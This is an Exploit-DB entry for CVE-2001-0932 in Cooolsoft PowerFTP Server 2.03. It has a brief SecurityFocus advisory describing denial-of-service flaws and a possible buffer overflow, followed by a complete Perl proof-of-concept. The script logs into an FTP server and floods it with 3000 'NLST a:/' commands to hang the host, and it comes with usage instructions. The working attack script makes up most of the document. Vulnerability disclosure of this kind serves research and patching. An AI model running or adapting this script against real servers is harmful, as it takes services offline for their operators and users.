Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerability 2

2001-11-29T00:00:00
ID EDB-ID:21163
Type exploitdb
Reporter Alex Hernandez
Modified 2001-11-29T00:00:00

Description

Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial Of Service Vulnerability (2). CVE-2001-0932. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/3595/info
 
 
PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.
 
Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.
 
It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.
 
This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed. 

#!/usr/bin/perl
#
# Even though the server will deny access, the slow hardware 
# will still hang the machine. This program attempts to 
# exploit this weakness by sending the 'NLST a:/' command to 
# the server 
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass>
#
# Example: 
#
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
# 

use IO::Socket;

print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

#$NUMBER_TO_SEND = 3000; 
$BUFF = 3000; 

if ( scalar @ARGV < 4 ) {
    print "Usage: $0 <server> <port> <user> <pass>\n";
    exit();
}


$target = $ARGV[ 0 ];
$port = $ARGV[ 1 ];
$username = $ARGV[ 2 ];
$password = $ARGV[ 3 ];

print "Creating socket... ";
$sock = new IO::Socket::INET( PeerAddr => $target,
                              PeerPort => int( $port ), 
                                Proto => 'tcp' );
die "$!" unless $sock;
print "done.\n";


read( $sock, $buffer, 1 );


print "Sending username...";
print $sock "USER " . $username . "\n";
read( $sock, $buffer, 1 );
print "done.\n";


print "Sending password...";
print $sock "PASS " . $password . "\n";
read( $sock, $buffer, 1 );
print "done.\n";


print "DoS Attack floppy server...";
for( $i = 0; $i < $BUFF; $i++ ) {

    print $sock "NLST a:/\n";   
    read( $sock, $buffer, 1 );
}

print "done.\n";

close( $sock );
exit();